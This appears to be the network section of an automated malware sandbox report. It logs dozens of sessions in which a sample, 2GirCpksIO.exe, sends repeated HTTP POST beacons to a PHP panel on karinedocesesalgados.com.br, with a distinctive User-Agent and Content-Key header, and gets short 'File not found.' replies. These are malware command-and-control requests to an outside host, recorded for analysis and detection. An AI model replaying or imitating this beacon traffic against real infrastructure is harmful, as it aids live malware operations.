                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                198192.168.11.2049985192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                199192.168.11.2049986192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.11.2049789192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:07.797027111 CET314OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 3211
                                Connection: close
                                Nov 22, 2021 15:29:08.094770908 CET318INHTTP/1.1 404 Not Found
                                Date: Mon, 22 Nov 2021 14:29:07 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 15
                                Content-Type: text/html
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                20192.168.11.2049807192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:25.681197882 CET342OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:25.973185062 CET342INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:25 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                200192.168.11.2049987192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                201192.168.11.2049988192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                202192.168.11.2049989192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                203192.168.11.2049990192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                204192.168.11.2049991192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                205192.168.11.2049992192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                206192.168.11.2049993192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                207192.168.11.2049994192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                208192.168.11.2049995192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                209192.168.11.2049996192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                21192.168.11.2049808192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:26.756022930 CET343OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:27.049078941 CET344INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:26 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                210192.168.11.2049997192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                211192.168.11.2049998192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                212192.168.11.2049999192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                213192.168.11.2050000192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                214192.168.11.2050001192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                215192.168.11.2050002192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                216192.168.11.2050003192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                217192.168.11.2050004192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                218192.168.11.2050005192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                219192.168.11.2050006192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                22192.168.11.2049809192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:27.791623116 CET344OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:28.087519884 CET345INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:27 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                220192.168.11.2050007192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                221192.168.11.2050008192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                222192.168.11.2050009192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                223192.168.11.2050010192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                224192.168.11.2050011192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                225192.168.11.2050012192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                226192.168.11.2050013192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                227192.168.11.2050014192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                228192.168.11.2050015192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                229192.168.11.2050016192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                23192.168.11.2049810192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:28.696367979 CET346OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:28.990336895 CET346INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:28 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                230192.168.11.2050017192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                231192.168.11.2050018192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                232192.168.11.2050019192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                233192.168.11.2050020192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                234192.168.11.2050021192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                235192.168.11.2050022192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                236192.168.11.2050023192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                237192.168.11.2050024192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                238192.168.11.2050025192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                239192.168.11.2050026192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                24192.168.11.2049811192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:29.657840014 CET347OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:29.970290899 CET347INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:29 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                240192.168.11.2050027192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                241192.168.11.2050028192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                242192.168.11.2050029192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                243192.168.11.2050030192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                244192.168.11.2050031192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                245192.168.11.2050032192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                246192.168.11.2050033192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                247192.168.11.2050034192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                248192.168.11.2050035192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                249192.168.11.2050036192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                25192.168.11.2049812192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:30.622632027 CET348OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:30.920140982 CET349INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:30 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                250192.168.11.2050037192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                251192.168.11.2050038192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                252192.168.11.2050039192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                253192.168.11.2050040192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                254192.168.11.2050041192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                255192.168.11.2050042192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                256192.168.11.2050043192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                257192.168.11.2050044192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                258192.168.11.2050045192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                259192.168.11.2050046192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                26192.168.11.2049813192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:31.575959921 CET349OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:31.868001938 CET350INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:31 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                260192.168.11.2050047192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                261192.168.11.2050048192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                262192.168.11.2050049192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                263192.168.11.2050050192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                264192.168.11.2050051192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                265192.168.11.2050052192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                266192.168.11.2050053192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                267192.168.11.2050054192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                268192.168.11.2050055192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                269192.168.11.2050056192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                27192.168.11.2049814192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:32.498085976 CET351OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:32.784888983 CET351INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:32 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                270192.168.11.2050057192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                271192.168.11.2050058192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                272192.168.11.2050059192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                273192.168.11.2050060192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                274192.168.11.2050061192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                275192.168.11.2050062192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                276192.168.11.2050063192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                277192.168.11.2050064192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                278192.168.11.2050065192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                279192.168.11.2050066192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                28192.168.11.2049815192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:33.425503969 CET352OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:33.749982119 CET352INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:33 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                280192.168.11.2050067192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                281192.168.11.2050068192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                282192.168.11.2050069192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                283192.168.11.2050070192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                284192.168.11.2050071192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                285192.168.11.2050072192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                286192.168.11.2050073192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                287192.168.11.2050074192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                288192.168.11.2050075192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                289192.168.11.2050076192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                29192.168.11.2049816192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:34.289947033 CET353OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:34.608282089 CET354INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:34 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                290192.168.11.2050077192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                291192.168.11.2050078192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                292192.168.11.2050079192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                293192.168.11.2050080192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                294192.168.11.2050081192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                295192.168.11.2050082192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                296192.168.11.2050083192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                297192.168.11.2050084192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                298192.168.11.2050085192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                299192.168.11.2050086192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.11.2049790192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:08.696327925 CET319OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:09.009121895 CET319INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:08 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


